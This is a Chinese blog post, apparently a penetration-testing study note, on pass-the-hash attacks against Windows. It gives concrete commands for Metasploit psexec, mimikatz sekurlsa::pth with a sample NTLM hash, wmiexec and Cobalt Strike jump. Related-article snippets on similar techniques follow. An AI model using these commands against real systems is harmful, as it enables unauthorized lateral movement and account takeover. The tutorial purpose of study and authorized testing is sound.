hash传递攻击

最新推荐文章于 2024-05-02 16:37:48 发布
最新推荐文章于 2024-05-02 16:37:48 发布
阅读量720 收藏
点赞数
分类专栏: 内网渗透 文章标签: 哈希算法 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/131043331
版权

简介

Pass the hash也就是Hash传递攻击,简称为PTH。模拟用户登录不需要用户明文密码只需要hash值就可以直接来登录目标系统。

利用前提条件是:

  • 开启445端口
  • 开启ipc$共享

Metasploit pesexec模块

windows/smb/psexec

这里主要设置smbuser、smbPass

这里的smbpass也可以使用明文密码登录

Mimikatz hash传递攻击

mimikatz.exe "privilege::debug"  "sekurlsa::pth /user:Administrator /domain:192.168.222.135 /ntlm:99f249f5481f98de98f14cc8985d610b" exit

运行后会出现一个弹窗,可以直接使用ipc连接

dir \\192.168.222.135\c$

wmiexec/smbexec进行hash传递

 wmiexec.exe -hashes LMHash:NTHash 用户名@目标IP

这里的wmiexec.exe是通过wmiexec.py编译的

cs的hash传递攻击

首先进行内网扫描,选择jump->psexec

选择其中的参数

稍作等待成功上线,且为system权限

powershell的hash传递攻击

这个的话总是报错,就无法执行成功,可参考其他文章进行学习

Invoke-TheHash:PowerShell实现的哈希传递攻击套件 - FreeBuf网络安全行业门户

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1565
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
内网渗透手法之哈希传递
一个努力学习网安的小牛马
11-29 427
哈希传递的手法
网络协议从入门到底层原理(7)网络安全 - 常见攻击、单向散列函数、对称加密、非对称加密
最新发布
2401_84254057的博客
05-02 30
能快速计算出散列值具备常见的几种单向散列函数产生128bit的散列值,MD就是Message Digest的缩写产生160bit的散列值SHA-256,SHA-384,SHA-512,散列值长度分别是256bit,384bit,512bit全新标准单向散列函数 - 防止数据被篡改如何防止数据被篡改?官方给处一串 SHA-256,用于检验下载后的文件是否被篡改。单向散列函数 - 密码加密现在数据库不会直接存储密码明文,存储的都是加密过后的值。(所以现在的也无法看到原密码,只能重置成新密码)
哈希传递攻击
good good study
05-05 1436
​ 目标计算机间如果开启了默认共享又关闭了防火墙,我们如果知道它的用户名和密码,则可以进行ipc$连接。其原理是基于ntlm网络认证。但是ipc$连接需要明文的密码,假如我们只获取了密码的hash值解不出明文,该怎么连接了?此时我们可以进行hash传递(Pass-the-Hash),即输入账号和hash值,进行连接 ​
内网渗透 - 哈希传递攻击
LuckySec
06-06 2323
在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击攻击者不需要花时间破解密码哈希值来获取明文密码
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatz和CS进行哈希传递攻击
AA8j的博客
11-15 3334
文章目录1. mimikatz1.1 NTLM Hash传递攻击1.2 AES-256 哈希传递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希传递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash传递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows明文密码与散列值的若干方法和防御手段
内网渗透测试小Demo-哈希传递攻击
Love&Share
11-26 2335
文章目录环境搭建Win Server2003Win Server2008拿shell收集信息哈希传递攻击mimikatz推荐阅读 环境搭建 Win Server2003 设置账户密码 右击我的电脑,选择管理,添加本地用户和组,重置admin的密码为123456,方便之后的操作 在vmware中为虚拟机添加一个网卡,网络连接选择LAN区段 开机后手动设置IP地址为 10.0.0.2/24 ipconfig Win Server2008 虚拟机网络连接选择LAN区段,开机后手动设置IP地址为 10.0.
115_使用 CrackMapExec 进行 NTLM Hash 传递攻击1
08-03
1.客户端发送用户名和域名到服务器 2.服务器转发到域控制器DC 3. DC 用客户端密码随机产生一个 8 4.服务器将挑战转发给客户端 5.客户端用密码经过
CVPR21_Transferred_Hash
03-28
CVPR21_Transferred_Hash PyTorch的实现被CVPR 2021接受,它是“您看到我想让您看到的内容:探索基于哈希的图像检索系统的有针对性的黑匣子可传递攻击”。准备环境您将需要CUDA设备来运行我们的代码。 基本上,您...
cobalt-arsenal:我收集的经过考验的Cobalt Strike 4.0+攻击者脚本
04-13
钴- 我发布的一套针对Cobalt Strike的Aggressor Scripts 4.0+ Beacon_Initial_Tasks.cna此脚本可让您配置应在第一次Beacon检Beacon_Initial_Tasks....脚本中从传递的字符串中调用几乎任意的Cobalt Strike命令: beac
针对PHP开发安全问题的相关总结
01-20
需要在服务器端进行验证,对每个php脚本验证传递到的数据,防止XSS攻击和SQL注入 2、不相信用户 要假设你的网站接收的每一条数据都是存在恶意代码的,存在隐藏的威胁,要对每一条数据都进行清理 3、关闭
各大厂商护网面试题汇总
06-26
也可以使用票据传递攻击和NTLM Relay攻击等方法。 6. 正向shell方法: 可以使用reg之类的方法,也可以通过webshell实现内网SOCK4代理,端口映射可以使目标不出网情况下在cs上线。 7. 域内委派: 域委派是大型...
内网渗透——哈希传递
来日可期的博客
10-09 1114
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
域渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1896
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
哈希传递
2301_77915293的博客
07-06 109
Windows操作系统通常使用两种方法对用户的明文密码进行加密处理。在域环境中,用户信息存储在 ntds.dit_中加密后为散列值。Windows 操作系统中的密码一般由两部分组成一部分为 LM Hash,另一部分为 NTLMHash。在 Windows 操作系统中,Hash 的结构通常如下。
哈希传递攻击(Pass-the-Hash,PtH)
谢公子的博客
01-11 5191
目录 哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...
hash传递攻击谈相关Windows安全机制
weixin_33998125的博客
08-01 225
前言 path-the-hash,中文直译过来就是hash传递,在域中是一种比较常用的攻击方式。在网上所找到的资料,大多数是介绍如何实现此类攻击,但对于它背后所隐藏的关于Windows安全机制的一些知识,却鲜有探讨。本文的目的就是从pass-the-hash这一古老的话题切入,由攻击过程中Windows的行为引出它背后的安全机制,让大家对Windows有...
正确传递hash引用
ace_fei的专栏
06-10 1206
    大家应该知道哈希引用需要初始化,这我就不多说了。    我就主要分享下传入哈希引用有两种方式    #!/usr/bin/perluse Data::Dumper;sub foo { my $h = shift; $h->{hello} = World!;}my $a;my $b = {};foo($a); print Dumper(
后渗透模块之Hash传递
weixin_45007073的博客
01-26 374
前言 我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。 利用过程 前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块 use exploit/windows/smb/psexec set rhosts 192.168.75.139 set smbuser pyh(普通管理员账户) set smbpass aad3b435b51404eeaad
hashcat掩码攻击
11-02
hashcat掩码攻击可以使用多种不同的掩码模式,例如使用数字、字母、符号等不同的字符集,以及指定密码中每个字符的位置等。在使用掩码攻击时,需要根据密码的特点和已知信息来选择合适的掩码模式,以提高破解效率和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值